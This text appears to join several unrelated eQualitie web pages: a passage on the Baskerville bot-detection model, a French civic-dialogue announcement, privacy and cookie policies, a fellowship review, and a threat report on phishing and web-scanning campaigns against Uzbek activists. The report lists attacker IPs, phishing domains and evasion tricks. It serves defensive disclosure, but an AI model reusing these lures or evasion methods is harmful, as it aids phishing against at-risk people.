Despite the fact that we don’t need labels to train a model, we still need a labelled dataset of historical attacks for parameter tuning. Traditionally, labelling is a challenging procedure since it requires a lot of manual work. Every new attack must be reported and investigated, and every IP should be labelled either malicious or benign.
Our production environment reports several incidents a week, so we designed an automated procedure of labelling using a machine model trained on the same features we use for the Isolation Forest anomaly detection model.
We reasoned that if an attack incident has a clearly visible traffic spike, we can assume that the vast majority of the IPs during this period are malicious, and we can train a classifier like Random Forest particularly for this incident. The only user input would be the precise time period for that incident and for the time period for ordinal traffic for that host. Such a classifier would not be perfect, but it would be good enough to be able to separate some regular IPs from the majority of malicious IPs during the time of the incident. In addition, we assume that attacker IPs most likely are not active immediately before the attack, and we do not label an IP as malicious if it was seen in the regular traffic period.
This labelling procedure is not perfect, but it allows us to label new incidents with very little time or human interaction.

An example of the labelling procedure output
Performance Metrics
We use the Precision-Recall AUC metric for model performance evaluation. The main reason for using the Precision-Recall metric is that it is more sensitive to the improvements for the positive class than the ROC (receiver operating characteristic) curve. We are less concerned about the false positive rate since, in the event that we falsely predict that an IP is doing something malicious, we won’t ban it, but only notify the rule-based attack mitigation system to challenge that specific IP. The IP will only be banned if the challenge fails.

The performance of two different models on two different attacks
Categorical Features
After two months of validating our approach in the production environment, we started to realize that the model was not sophisticated enough to distinguish anomalies specific only to particular clients.
The main reason for this is that the originally published Isolation Forest algorithm supports only numerical features, and could not work with so-called categorical string values, such as hostname. First, we decided to train a separate model per target host and create an assembly of models for the final prediction. This approach over complicated the whole process and did not scale well. Additionally, we had to take care of adjusting the weights in the model assembly. In fact, we jeopardized the original idea of knowledge sharing by having a single model for all the clients. Then we tried to use the classical way of dealing with this problem: one-hot encoding. However, the deployed solution did not work well since the model became too overfit to the new hostname feature, and the performance decreased.
In the next iteration, we found another way of encoding categorical features based on a peer-review paper recently published in 2018. The main idea was not to use one-hot encoding, but rather to modify the tree-building algorithm itself. We could not find the implementation of the idea, and had to modify the source code of IForest library in Scala. We introduced a new string feature ‘hostname,’ and this time the model showed notable performance improvement in production. Moreover, our final implementation was generic and allowed us to experiment with other categorical features like country, user agent, operating system, etc.
Stratified Sampling
Baskerville uses a single machine learning model trained on the data received from hundreds of clients.This allows us to share the knowledge and benefit from a model trained on a global dataset of recorded incidents. However, when we first deployed Baskerville, we realized that the model is biased towards high traffic clients.
We had to find a balance in the amount of data we feed to the training pipeline from each client. On the one hand, we wanted to equalize the number of records from each client, but on the other hand, high traffic clients provided much more valuable incident information. We decided to use stratified sampling of training datasets with a single parameter: the maximum number of samples per host.
Storage
Baskerville uses Postgres to store the processed results. The request-sets table holds the results of the real-time weblogs pre-processed by our analytics engine which has an estimated input of ~30GB per week. So, within a year, we’d have a ~1.5 TB table. Even though this is within Postgres limits, running queries on this would not be very efficient. That’s where the data partitioning feature of Postgres came in. We used that feature to split the request sets table into smaller tables, each holding one week’s data. . This allowed for better data management and faster query execution.
However, even with the use of data partitioning, we needed to be able to scale the database out. Since we already had the Timescale extension for the Prometheus database, we decided to use it for Baskerville too. We followed Timescale’s tutorial for data migration in the same database, which means we created a temp table, moved the data from each and every partition into the temp table, ran the command to create a hypertable on the temp table, deleted the initial request sets table and its partitions, and, finally, renamed the temp table as ‘request sets.’ The process was not very straightforward, unfortunately, and we did run into some problems. But in the end, we were able to scale the database, and we are currently operating using Timescale in production.
We also explored other options, like TileDb, Apache Hive, and Apache HBase, but for the time being, Timescale is enough for our needs. We will surely revisit this in the future, though.
Architecture
The initial design of Baskerville was created with the assumption that Baskerville will be running under Deflect as an analytics engine, to aid the already in place rule-based attack detection and mitigation mechanism. However, the needs changed as it became necessary to open up Baskerville’s prediction to other users and make our insights available to them.
In order to allow other users to take advantage of our model, we had to redesign the pipelines to be more modular. We also needed to take into account the kind of data to be exchanged, more specifically, we wanted to avoid any exchange that would involve sensitive data, like IPs for example. The idea was that the preprocessing would happen on the client’s end, and only the resulting feature vectors would be sent, via Kafka, to the Prediction centre. The Prediction centre continuously listens for incoming feature vectors, and once a request arrives, it uses the pre-trained model to predict and send the results back to the user. This whole process happens without the exchange of any kind of sensitive information, as only the feature vectors go back and forth.
On the client side, we had to implement a caching mechanism with TTL, so that the request sets wait for their matching predictions. If the prediction center takes more than 10 minutes, the request sets expire. 10 minutes, of course, is not an acceptable amount of time, just a safeguard so that we do not keep request sets forever which can result in OOM. The ttl is configurable. We used Redis for this mechanism, as it has the ttl feature embedded, and there is a spark-redis connector we could easily use, but we’re still tuning the performance and thinking about alternatives. We also needed a separate spark application to handle the prediction to request set matching once the response from the Prediction center is received.. This application listens to the client specific Kafka topic, and once a prediction arrives, it looks into redis, fetches the matched request set, and saves everything into the database.
To sum up, in the new architecture, the preprocessing happens on the client’s side, the feature vectors are sent via Kafka to the Prediction centre (no sensitive data exchange), a prediction and a score for each request set is sent as a reply to each feature vector (via Kafka), and on the client side, another Spark job is waiting to consume the prediction message, match it with the respective request set, and save it to the database.
We, the Internet (Nous l’Internet)
Les Québécois et les francophones du Canada participeront bientôt au plus grand dialogue citoyen mondial jamais organisé sur l’avenir de l’Internet.
En octobre 2020, des milliers de personnes représentant la diversité de leur pays respectifs se réuniront dans 70 pays pour livrer leur vision de l’avenir de l’Internet, ce qui en fera la plus grande participation citoyenne jamais organisée.
Au Québec, ce dialogue virtuel se tiendra les 23 et 24 octobre et la population est invitée à s’inscrire dès maintenant pour y participer. Initié par l’organisation française Missions Publiques, l’événement s’inscrit dans une démarche à l’échelle mondiale dont l’objectif est de faire naître une parole citoyenne sur un sujet clé : l’avenir du numérique.
Durant le Dialogue Citoyen mondial sur l’avenir d’Internet, 100 participants de chaque pays sont invités à apprendre, discuter et décider de ce qui pour eux, fera d’Internet un outil meilleur pour les années à venir. Au Québec, ce forum est organisé par eQualitie en collaboration avec le chapitre québécois de l’Internet Society et la Fondation SecDev.
Des discussions marquées par la COVID-19
À l’heure d’une pandémie mondiale, Internet devient l’épine dorsale de nos interactions sociales. Par conséquent, le sujet de la COVID-19 s’immiscera à l’intérieur des thématiques déjà prévues: l’identité numérique, la cybersécurité, l’information et la désinformation à l’ère du numérique, ainsi que l’intelligence artificielle. Cette délibération mondiale permettra d’élaborer des recommandations citoyennes informées qui seront soumises aux décideuses et décideurs au niveau local, régional et international. Les résultats des délibérations seront soumis au Forum Québécois sur la Gouvernance d’Internet québécois, ainsi que leur équivalent au niveau canadien et international.
Pour Dmitri Vitaliev, directeur d’eQualitie, « les enjeux du développement des technologies imposent de faire renaître la confiance entre les citoyens et les décideurs. C’est pourquoi les modes de gouvernance doivent devenir plus inclusifs pour s’adapter aux défis à venir. »
« Nous l’Internet – We, the Internet » est coordonné par une coalition de partenaires mondiaux tels que la Commission européenne, l’UNESCO, l’Internet Society, la Wikimedia Foundation, la World Wide Web Foundation, ainsi que les gouvernements suisses et allemands, notamment.
Pour informations :
Michel Lambert
A propos :
Nous l’Internet (Québec) Inscriptions
We The Internet (Global)
Privacy Policy
eQualitie’s Website Privacy Policy
Contact forms
When you complete a questionnaire or a web form on this website, we will collect and store the following personal data you may provide:
- your name, if provided
- phone number, if provided
- email, if provided
- attachments, if provided
- all responses to our questions, if provided
- Your computer’s IP address, when submitting the form
Cookies
Our website uses cookies, please see the cookie policy.
Analytics
Your information is accessed only by eQualitie for the purposes of providing this service to you.
Who we share your data with
By default we will not share your data with anyone. On occasion, we will share your personal data only with the people and/or organizations listed on the page requesting personal data.
How long we retain your data
Your personal data will be retained for 12 months from the date of collection, unless otherwise explicitly stated in the explanatory text next to the consent checkbox. We will contact you should we require additional consent thereafter. If we do not receive a response from you, we will securely wipe your data from our systems.
What rights you have over your data
Your personal data is protected by PIPEDA. You retain full rights of your personal data and may contact us to request what personal data we hold on your behalf, or to delete it.
If you have submitted personal data on this site, you can request its deletion by writing to us using the contact form. This does not include any data we are obliged to keep for administrative, legal, or security purposes.
Where we send your data
Your replies may be checked through an automated spam detection service.
Cookie Policy (CA)
This page was last changed on December 1, 2021, last checked on December 1, 2021 and applies to citizens and legal permanent residents of Canada.
1. Introduction
Our website, https://equalit.ie (hereinafter: "the website") uses cookies and other related technologies (for convenience all technologies are referred to as "cookies"). Cookies are also placed by third parties we have engaged. In the document below we inform you about the use of cookies on our website.
2. What are cookies?
A cookie is a small simple file that is sent along with pages of this website and stored by your browser on the hard drive of your computer or another device. The information stored therein may be returned to our servers or to the servers of the relevant third parties during a subsequent visit.
3. What are scripts?
A script is a piece of program code that is used to make our website function properly and interactively. This code is executed on our server or on your device.
4. What is a web beacon?
A web beacon (or a pixel tag) is a small, invisible piece of text or image on a website that is used to monitor traffic on a website. In order to do this, various data about you is stored using web beacons.
5. Third parties
We have made agreements about the use of cookies with other companies that place cookies. However, we cannot guarantee that these third parties handle your personal data in a reliable or secure manner. Parties such as Google are to be considered as independent data controllers. We recommend that you read the privacy statements of these companies.
6. Cookies
6.1 Technical or functional cookies
Some cookies ensure that certain parts of the website work properly and that your user preferences remain known. By placing functional cookies, we make it easier for you to visit our website. This way, you do not need to repeatedly enter the same information when visiting our website and, for example, the items remain in your shopping cart until you have paid.
6.2 Statistics cookies
We use statistics cookies to optimize the website experience for our users. With these statistics cookies we get insights in the usage of our website.
6.3 Marketing/Tracking cookies
Marketing/Tracking cookies are cookies or any other form of local storage, used to create user profiles to display advertising or to track the user on this website or across several websites for similar marketing purposes.
6.4 Social media
On our website, we have included content from Twitter to promote web pages (e.g. “like”, “pin”) or share (e.g. “tweet”) on social networks like Twitter. This content is embedded with code derived from Twitter and places cookies. This content might store and process certain information for personalized advertising.
Please read the privacy statement of these social networks (which can change regularly) to read what they do with your (personal) data which they process using these cookies. The data that is retrieved is anonymized as much as possible. Twitter is located in the United States.
7. Placed cookies
8. Consent
When you visit our website for the first time, we will show you a pop-up with an explanation about cookies. You do have the right to opt-out and to object against the further use of non-functional cookies.
8.1 Manage your consent settings
You can also disable the use of cookies via your browser, but please note that our website may no longer work properly.
9. Enabling/disabling and deleting cookies
You can use your internet browser to automatically or manually delete cookies. You can also specify that certain cookies may not be placed. Another option is to change the settings of your internet browser so that you receive a message each time a cookie is placed. For more information about these options, please refer to the instructions in the Help section of your browser. Or you can indicate your preferences on the following page: youradchoices.ca
Please note that our website may not work properly if all cookies are disabled. If you do delete the cookies in your browser, they will be placed again after your consent when you visit our website again.
10. Your rights with respect to personal data
You have the following rights with respect to your personal data:
- you may submit a request for access to the data we process about you;
- you may object to the processing;
- you may request an overview, in a commonly used format, of the data we process about you;
- you may request correction or deletion of the data if it is incorrect or not or no longer relevant. Where appropriate, the amended information shall be transmitted to third parties having access to the information in question.
- You have the right to withdraw consent at any time, subject to legal or contractual restrictions and reasonable notice. You will be informed of the implications of such withdrawal.
- You have the right to address a challenge concerning non-compliance with PIPEDA to our organization and, if the issue is not resolved, to the Office of the Privacy Commissioner of Canada.
To exercise these rights, please contact us. Please refer to the contact details at the bottom of this Cookie Policy. If you have a complaint about how we handle your data, we would like to hear from you.
11. Contact details
For questions and/or comments about our Cookie Policy and this statement, please contact us by using the following contact details:
eQualitie Inc
CP 22112 BP IBERVILLE
MONTREAL, QC, H1Y3K8
Canada
Website: https://equalit.ie
Email: ei.tilauqe@ycavirp
Phone number: 18638732841
This Cookie Policy was synchronized with cookiedatabase.org on October 9, 2020.
eQ offers Deflect website security services for free in response to COVID-19
In response and solidarity with numerous efforts that have sprung up to help with communications, coordination and outreach during the COVID-19 epidemic, eQualitie is offering Deflect website security and content delivery services for free until the end of 2020 to organizations and individuals working to help others during this difficult time. This includes:
- Availability: as demand for your content grows, our worldwide infrastructure will ensure that your website remains accessible and fast
- Security: protecting your website from malicious bots and hackers
- Hosting: for existing or new WordPress sites
- Aanalytics: view real-time statistics in the Deflect dashboard
Deflect is always offered free of charge to not-for-profit entities that meet our eligibility requirements. This offer extends our free services to any business or individual that is responding to societal needs during the pandemic, including media organizations, government, online retail and hospitality services, etc. We will review all applications to make sure they align with Deflect’s Terms of Use.
It takes 15 minutes to set up and we’ll have you protected on the same day. Our support team can help you in English, French, Chinese, Spanish and Russian. If you have any questions please contact us.
Web Security Fellowship – project review
Launched in early 2019, the Web Security Fellowship was a pilot project for eQualitie to introduce more IT professionals to the ranks of active civil society organizations. Eight fellows were selected from a public application process for a six-month placement within host organizations, comprising of human rights and independent media groups in Russia. The fellowship began with a three month intensive program on improving technical security insight and practical skills among the fellows. Thereafter, together with their host organization, fellows came up with a project or a series of tasks to improve the security of the host organization’s Web platform, mobile application or technical process. Herein we present the fellows, their projects and outcomes.
Webinar program
Presented by industry experts from the Runet, 10 online lectures were held within a three month period. The course material included:
- Organizational audits: technology assessment, risks & vulnerabilities, operation security
- Implementing a “security policy” within a civil society organization
- Strengthening web servers
- Cyber law, digital violence and censorship
- Latest developments in Internet censorship and its circumvention
- The theoretical and practical aspects of platform penetration testing
- Web site security: hosting and DNS, performance analysis and load testing, DDoS mitigation
- OWASP TOP 10 methodology
- Defensive programming
- Secure-by-design principles and system architectures
Meet the fellows and their projects
Aleksandr, Moscow
“I am working as a system administrator at the Memorial society’s Moscow office since 2009. My job is to administer the Windows Active Directory and Linux-based PC’s. I can design networks and configure network hardware on RouterOS and PfSense, make up html/css pages. I can provide video streaming, audio processing and editing, and technical support at public events (sound and video directing). At the basic level, I can administer *nix-based Web servers. I don’t know how to write codes (except simple Python/bash scripts), or to administer Windows-based Web servers.
In my spare time I work as several holiday schools’ manager (notably the Puschino Winter School and the Molecular and Theoretical Biology School), learn to play guitar, play video games, watch series and, last but not least, rear my daughter”.
Organization: International Memorial
Project: Improve the security of the web hosting server, making further recommendations to in-house developers
Tasks: Audit the security of base.memo.ru: develop a threat model, interview web developers, perform black box and white box penetration tests, analyze the configuration of the host site and audit the site code. Based on the results of the audit – re-configure the host server software to improve its security and set draft recommendations for the developer of the website application.
Project details: Pentest critical vulnerabilities using burp/owasp zap, sqlmap; configure monitor services (zabbix or its equivalent), harden the OS and its access interfaces (ssh, https).
Artemy, Moscow
“For more than a decade I have been developing applications and services. I prefer Kotlin, Java, Python; I use Sketch to draw designs and I love Material design. In my spare time I dig into engines when my Subaru would not accelerate or to switch my gear box to sport”.
Organisation: Not disclosed
Project: Make it harder to block application circuits
Tasks: Code a prototype library to identify the locker and lock them.
Project details: To block Telegram, Roskomnadzor has been using IP blocking via an Android system to lock the IPs that the application listens to when it tries to connect and masking its presence using the providers’ VPN networks. The objective of this project is to identify the locker who uses the above method; it may well stay relevant judging by the news briefs: Roskomnadzor plans to lock applications using DPI, the task being prolonged for over five years. A prototype implementation should have the same device distributing and receiving IPs as well as searching them and locking; it is to simplify the logic for a prototype. The battlefield version of this project is planned to distribute IPs from the back end using several circuits and other technologies to circumvent the locking.
Github: github.com/art2limit/Offenbarung
Nikita, Moscow
“I work in the field of Information Security expertise for business software — I provide support for the SIEM system. During my work I scanned through innumerable logs and learned to scoop as much as possible; I worked with a wide range of IT systems (FW, DLP, antiviruses, hypervisors, DNS, DHCP, proxies and others) and usually know what’s happening inside and where to dig to come up with a relevant thing. I am good at problems finding and solving and I love to optimize the trivialities using Python. I am interested in many security trends but even more I love good muzak and movie from Carbon Based Lifeforms to Pearl Jam to Angerfist and from Clerks to The Good, the Bad and the Ugly to Sharknado”.
Organization: Mass Media Defence Centre
Project: An integrated Web platform
Objective: To free the organization from the multitude of difficult to maintain and ageing tools by creating a universal and easily maintained platform able to host all the current information resources and extendable to include more resources in the future and to enhance the availability. To secure the organization’s access to the external network and ensure the stability of that access.
Tasks:
- Project and devise a Web platform based on the state of the art tools and capable to host any of organization’s sites; develop and implement an enhanced availability (to block attacks and lockings).
- Clear up the technicalities of network communications inside the organization.
Oksana, Saint Petersburg
“I have done some web-site design in WordPress and application coding in clean-code-javascript using several frameworks. More on my projects is available here: http://o.web-corner.net/ And once I have been working on an application for an NPO using a database that contained sensitive information (together with the backend’s developer); the backend was in Java, the frontend was in VueJS”.
Organization: Nochlezhka
Project: Secure web hosting
Objective: To enhance the security of organization’s Web resources
Tasks:
- Restrict the free access to the organization’s main web-site from volunteers and other non-members of the staff;
- Check the volume of the critical information about our resources available from the outside;
- Develop a logins and passwords storage system for the members of the staff;
- Configure back-ups of the main Web site;
- Configure server applications to block brute force attacks;
- Configure the monitoring;
- Make corrections to the Social Worker’s Multifunctional Cabinet application;
- Update php.
Anton, Yaroslavl
“I am a Linux, Windows system administrator; work with ERP and CRM systems (Microsoft Sharepoint, Dynamics). I mostly dealt with business information systems, deployed in on demand and hybrid environments. I have extensive experience in fine tuning Linux vps to several Web tasks provided with a basic security (fail2ban, access management using ssh and so on), as well as maintaining stacks /apache/mysql/php, nginx/mysql/php. I am an activist and a coordinator of the Golos movement in Yaroslavl”.
Organization: Not disclosed
Project: Fix the major holes in the organization’s security, deploy data storage engines and policies, and perform the back-ups.
Tasks:
- Make VPN-only the common access to the organization’s recourses and, the first of all, to the site’s administration panel;
- Set up a single place to store the inputs and provide the access control and the data encryption. The solution must support the storage of diverse data formats and media files. The data must be stored in a neutral jurisdiction;
- Fine-tune the work flow and an engine to back up the Web application’s database regularly;
- Check the application for critical vulnerabilities in the OWASP-10 list and eliminate/accept the risks;
- Solve the problems with physical networking hardware – upgrade the router, move it to the rented facility’s boundaries, configure the local network, the firewall, the common access to the recourses. Provide a guest Wi-Fi access to the Web.
Konstantin, Orenburg
White hacker, software engineer, fullstack developer.
“I am skilled in: Python, JavaScript, C++, videostreaming, heavily loaded systems, Django, Linux, telecommunications, React Native, Smart tv. I founded a technology company in the field of software design for IPTV/OTT operators and an OTT service provider (the company is Microimpuls, I am its CTO). My background is mathematician programmer”.
Organization: Horizontal Russia 7х7 interregional webzine
Project: Pentest a new Web site engine
Objective: Expose and fix security problems in a new self-made Website engine; reduce the penetration hazard.
Tasks:
- Scrutinize the architecture of the new Website as well as its subsystems;
- Scrutinize the source code of the engine and its modules;
- Expose actual and potential vulnerabilities of the Website; perform the penetration test;
- Come up with practical options to fix the vulnerabilities / fix them;
- Come up with options to reduce the penetration hazard / deploy them;
- Harden the server hosting the website;
- Set up the Website’s security monitoring and configure the tools to detect the penetrations;
- Develop rules for code-writing and for regular audit to maintain the Website’s security.
K., Moscow
“For a decade I have been professionally dealing with the development and production of Web projects – makeup, design, coding (nowadays it’s called full-stack). I am skilled in the makeup with js, jquery, html, and css. I do the coding mostly in drupal, php. Currently I am studying python. I prefer to apply to projects I find interesting in the fields of science, art (music, theatre, painting, photography) and advocacy”.
Organization: OVD-Info
Project: A preparation step to develop technical specifications for a detention monitoring database
Objective: Develop a UX matrix, User Stories. Scrutinize, analyze and select the software tools to develop the database.
Tasks: Develop a script and an interface for every role in the headquarters. Create a UX matrix. Determine the engine to develop the database as well as the technologies and systems that are updated and supported to power the project. Must communicate with every user group of a detention database (lawyers, monitors, analysts) to better understand the problems with current interfaces and take stock developing the technical specifications.
Boris, Moscow
“2006 to 2008 I worked as a Web layout designer and a Web developer in a large company in the field of distance education in Russia. For more than a decade I make my living from the repair, assembly and set up of computers and peripherals as well as setting up and tuning the computer networks.
Surely I am skilled in installing all sorts of software. I have an experience of teaching the computer science at school. For many times I was an IT-volunteer for OVD-Info. For a year I did technical maintenance at the human rights organization”.
Organization: Memorial Human Rights Center
Project: Design a plan to migrate Memorial HRC to a cloud
Objective: Develop a project for Memorial HRC to switch to a cloud service: give the project rationale and describe the transition phases. Design a plan, set up a cloud infrastructure, test it, migrate the data and start it up.
Tasks:
- Explain the rationale for moving to a cloud to the HRC staff; make a presentation of the transition phases;
- Choose a cloud provider;
- Set up security policies for the cloud participation;
- Provide a single input point to enter the application from any environment;
- Protect IDs in local and cloud environments;
- Provide integrated management for the cloud and the security;
- Configure cloud services for back ups and disaster recovery of the local environment;
- Set up a platform for consistent data;
- Deliver the benefits of having a common database both in the local environment and in the cloud;
- Save costs with moving the local data to the cloud;
- Apply services for the consistent data storage, analysis and visualization;
- Run the state of art applications in the local environment and in the cloud;
- Fine tune the intranet and purchase the routers to ready the Internet connection for seamlessly using the cloud services.
Deflect Survey
What do you think?
We want to hear from you, our dear clients. What did we do well this year? What could we improve? Please take a few moments to share your experience with us. Thank you from the Deflect team!
[contact-form-7 id=”29709″ title=”deflect-survey-en”]
Thank you!
Deflect Labs Report #6: Phishing and Web Attacks Targeting Uzbek Human Right Activists and Independent Media
Key Findings
- We’ve discovered infrastructure used to launch and coordinate attacks targeting independent media and human rights activists from Uzbekistan
- The campaign has been active since early 2016, using web and phishing attacks to suppress and exploit their targets
- We have no evidence of who is behind this campaign but the target list points to a new threat actor targeting Uzbek activists and media
Introduction
The Deflect project was created to protect civil society websites from web attacks, following the publication of “Distributed Denial of Service Attacks Against Independent Media and Human Rights Sites report by the Berkman Center for Internet & Society. During that time we’ve investigated many DDoS attacks leading to the publication of several reports.
The attacks leading to the publication of this report quickly stood out from the daily onslaught of malicious traffic on Deflect, at first because they were using professional vulnerability scanning tools like Acunetix. The moment we discovered that the origin server of these scans was also hosting fake gmail domains, it became evident that something bigger was going on here.
In this report, we describe all the pieces put together about this campaign, with the hope to contribute to public knowledge about the methods and impact of such attacks against civil society.
Context : Human Rights and Surveillance in Uzbekistan

Emblem of Uzbekistan (wikipedia)
Uzbekistan is defined by many human-rights organizations as an authoritarian state, that has known strong repression of civil society. Since the collapse of the Soviet Union, two presidents have presided over a system that institutionalized torture and repressed freedom of expression, as documented over the years by Human Rights Watch, Amnesty International and Front Line Defenders, among many others. Repression extended to media and human rights activists in particular, many of whom had to leave the country and continue their work in diaspora.
Uzbekistan was one of the first to establish a pervasive Internet censorship infrastructure, blocking access to media and human rights websites. Hacking Team servers in Uzbekistan were identified as early as 2014 by the Citizen Lab. It was later confirmed that Uzbek National Security Service (SNB) were among the customers of Hacking Team solutions from leaked Hacking Team emails. A Privacy International report from 2015 describes the installation in Uzbekistan of several monitoring centers with mass surveillance capabilities provided by the Israeli branch of the US-based company Verint Systems and by the Israel-based company NICE Systems. A 2007 Amnesty International report entitled ‘We will find you anywhere’ gives more context on the utilisation of these capabilities, describing digital surveillance and targeted attacks against Uzbek journalists and human-right activists. Among other cases, it describes the unfortunate events behind the closure of uznews.net – an independent media website established by Galima Bukharbaeva in 2005 following the Andijan massacre. In 2014, she discovered that her email account had been hacked and information about the organization, including names and personal details journalists in Uzbekistan was published online. Galima is now the editor of Centre1, a Deflect client and one of the targets of this investigation.
A New Phishing and Web Attack Campaign
On the 16th of November 2018, we identified a large attack against several websites protected by Deflect. This attack used several professional security audit tools like NetSparker and WPScan to scan the websites eltuz.com and centre1.com.
Peak of traffic during the attack (16th of November 2018)
This attack was coming from the IP address 51.15.94.245 (AS12876 – Online AS but an IP range dedicated to Scaleway servers). By looking at older traffic from this same IP address, we found several cases of attacks on other Deflect protected websites, but we also found domains mimicking google and gmail domains hosted on this IP address, like auth.login.google.email-service[.]host
or auth.login.googlemail.com.mail-auth[.]top
. We looked into passive DNS databases (using the PassiveTotal Community Edition and other tools like RobTex) and crossed that information with attacks seen on Deflect protected websites with logging enabled. We uncovered a large campaign combining web and phishing attacks against media and activists. We found the first evidence of activity from this group in February 2016, and the first evidence of attacks in December 2017.
The list of Deflect protected websites chosen by this campaign, may give some context to the motivation behind them. Four websites were targeted:
- Fergana News is a leading independent Russian & Uzbek language news website covering Central Asian countries
- Eltuz is an independent Uzbek online media
- Centre1 is an independent media organization covering news in Central Asia
- Palestine Chronicle is a non-profit organization working on human-rights issues in Palestine
Three of these targets are prominent media focusing on Uzbekistan. We have been in contact with their editors and several other Uzbek activists to see if they had received phishing emails as part of this campaign. Some of them were able to confirm receiving such messages and forwarded them to us. Reaching out further afield we were able to get confirmations of phishing attacks from other prominent Uzbek activists who were not linked websites protected by Deflect.
Palestine Chronicle seems to be an outlier in this group of media websites focusing on Uzbekistan. We don’t have a clear hypothesis about why this website was targeted.
A year of web attacks against civil society
Through passive DNS, we identified three IPs used by the attackers in this operation :
- 46.45.137.74 was used in 2016 and 2017 (timeline is not clear, Istanbul DC, AS197328)
- 139.60.163.29 was used between October 2017 and August 2018 (HostKey, AS395839)
- 51.15.94.245 was used between September 2018 and February 2019 (Scaleway, AS12876)
We have identified 15 attacks from the IPs 139.60.163.29 and 51.15.94.245 since December 2017 on Deflect protected websites:
Date | IP | Target | Tools used |
---|---|---|---|
2017/12/17 | 139.60.163.29 |
eltuz.com | WPScan |
2018/04/12 | 139.60.163.29 |
eltuz.com | Acunetix |
2018/09/15 | 51.15.94.245 |
www.palestinechronicle.com eltuz.com www.fergana.info and uzbek.fergananews.com | Acunetix and WebCruiser |
2018/09/16 | 51.15.94.245 |
www.fergana.info | Acunetix |
2018/09/17 | 51.15.94.245 |
www.fergana.info | Acunetix |
2018/09/18 | 51.15.94.245 |
www.fergana.info | NetSparker and Acunetix |
2018/09/19 | 51.15.94.245 |
eltuz.com | NetSparker |
2018/09/20 | 51.15.94.245 |
www.fergana.info | Acunetix |
2018/09/21 | 51.15.94.245 |
www.fergana.info | Acunetix |
2018/10/08 | 51.15.94.245 |
eltuz.com, www.fergananews.com and news.fergananews.com | Unknown |
2018/11/16 | 51.15.94.245 |
eltuz.com, centre1.com and en.eltuz.com | NetSparker and WPScan |
2019/01/18 | 51.15.94.245 |
eltuz.com | WPScan |
2019/01/19 | 51.15.94.245 |
fergana.info www.fergana.info and fergana.agency | Unknown |
2019/01/30 | 51.15.94.245 |
eltuz.com and en.eltuz.com | Unknown |
2019/02/05 | 51.15.94.245 |
fergana.info | Acunetix |
Besides classic open-source tools like WPScan, these attacks show the utilization of a wide range of commercial security audit tools, like NetSparker or Acunetix. Acunetix offers a trial version that may have been used here, NetSparker does not, showing that the operators may have a consistent budget (standard offer is $4995 / year, a cracked version may have been used).
It is also surprising to see so many different tools coming from a single server, as many of them require a Graphical User Interface. When we scanned the IP 51.15.94.245, we discovered that it hosted a Squid proxy on port 3128, we think that this proxy was used to relay traffic from the origin operator computer.
Extract of nmap scan of 51.15.94.245 in December 2018 :
3128/tcp open http-proxy Squid http proxy 3.5.23 |_http-server-header: squid/3.5.23 |_http-title: ERROR: The requested URL could not be retrieved
A large phishing campaign
After discovering a long list of domains made to resemble popular email providers, we suspected that the operators were also involved in a phishing campaign. We contacted owners of targeted websites, along with several Uzbek human right activists and gathered 14 different phishing emails targeting two activists between March 2018 and February 2019 :
Date | Sender | Subject | Link |
---|---|---|---|
12th of March 2018 | g.corp.sender[@]gmail.com | У Вас 2 недоставленное сообщение (You have 2 undelivered message) | http://mail.gmal.con.my-id[.]top/ |
13th of June 2018 | service.deamon2018[@]gmail.com | Прекращение предоставления доступа к сервису (Termination of access to the service) | http://e.mail.gmall.con.my-id[.]top/ |
18th of June 2018 | id.warning.users[@]gmail.com | Ваш новый адрес в Gmail: alexis.usa@gmail.com (Your new email address in Gmail: alexis.usa@gmail.com) | http://e.mail.users.emall.com[.]my-id.top/ |
10th of July 2018 | id.warning.daemons[@]gmail.com | Прекращение предоставления доступа к сервису (Termination of access to the service) | hxxp://gmallls.con-537d7.my-id[.]top/ |
10th of July 2018 | id.warning.daemons[@]gmail.com | Прекращение предоставления доступа к сервису (Termination of access to the service) | http://gmallls.con-4f137.my-id[.]top/ |
18th of July 2018 | service.deamon2018[@]gmail.com | [Ticket#2011031810000512] – 3 undelivered messages | http://login-auth-goglemail-com-7c94e3a1597325b849e26a0b45f0f068.my-id[.]top/ |
2nd of August 2018 | id.warning.daemon.service[@]gmail.com | [Important Reminder] Review your data retention settings | None |
16th of October 2018 | lolapup.75[@]gmail.com | Экс-хоким Ташкента (Ex-hokim of Tashkent) | http://office-online-sessions-3959c138e8b8078e683849795e156f98.email-service[.]host/ |
23rd of October 2018 | noreply.user.info.id[@]gmail.com | Ваш аккаунт будет заблокировано (Your account will be blocked.) | http://gmail-accounts-cb66d53c8c9c1b7c622d915322804cdf.email-service[.]host/ |
25th of October 2018 | warning.service.suspended[@]gmail.com | Ваш аккаунт будет заблокировано. (Your account will be blocked.) | http://gmail-accounts-bb6f2dfcec87551e99f9cf331c990617.email-service[.]host/ |
18th of February 2019 | service.users.blocked[@]gmail.com | Важное оповещение системы безопасности (Important Security Alert) | http://id-accounts-blocked-ac5a75e4c0a77cc16fe90cddc01c2499.myconnection[.]website/ |
18th of February 2019 | mail.suspend.service[@]gmail.com | Оповещения системы безопасности (Security Alerts) | http://id-accounts-blocked-326e88561ded6371be008af61bf9594d.myconnection[.]website/ |
21st of February 2019 | service.users.blocked[@]gmail.com | Ваш аккаунт будет заблокирован. (Your account will be blocked.) | http://id-accounts-blocked-ffb67f7dd7427b9e4fc4e5571247e812.myconnection[.]website/ |
22nd of February 2019 | service.users.blocked[@]gmail.com | Прекращение предоставления доступа к сервису (Termination of access to the service) | http://id-accounts-blocked-c23102b28e1ae0f24c9614024628e650.myconnection[.]website/ |
Almost all these emails were mimicking Gmail alerts to entice the user to click on the link. For instance this email received on the 23rd of October 2018 pretends that the account will be closed soon, using images of the text hosted on imgur to bypass Gmail detection :
The only exception was an email received on the 16th of October 2018 pretending to give confidential information on the former Hokim (governor) of Tashkent :
Emails were using simple tricks to bypass detection, at times drw.sh url shortener (this tool belongs to a Russian security company Doctor Web) or by using open re-directions offered in several Google tools.
Every email we have seen used a different sub-domain, including emails from the same Gmail account and with the same subject line. For instance, two different emails entitled “Прекращение предоставления доступа к сервису” and sent from the same address used hxxp://gmallls.con-537d7.my-id[.]top/
and http://gmallls.con-4f137.my-id[.]top/
as phishing domains. We think that the operators used a different sub-domain for every email sent in order to bypass Gmail list of known malicious domains. This would explain the large number of sub-domains identified through passive DNS. We have identified 74 sub-domains for 26 second-level domains used in this campaign (see the appendix below for full list of discovered domains).
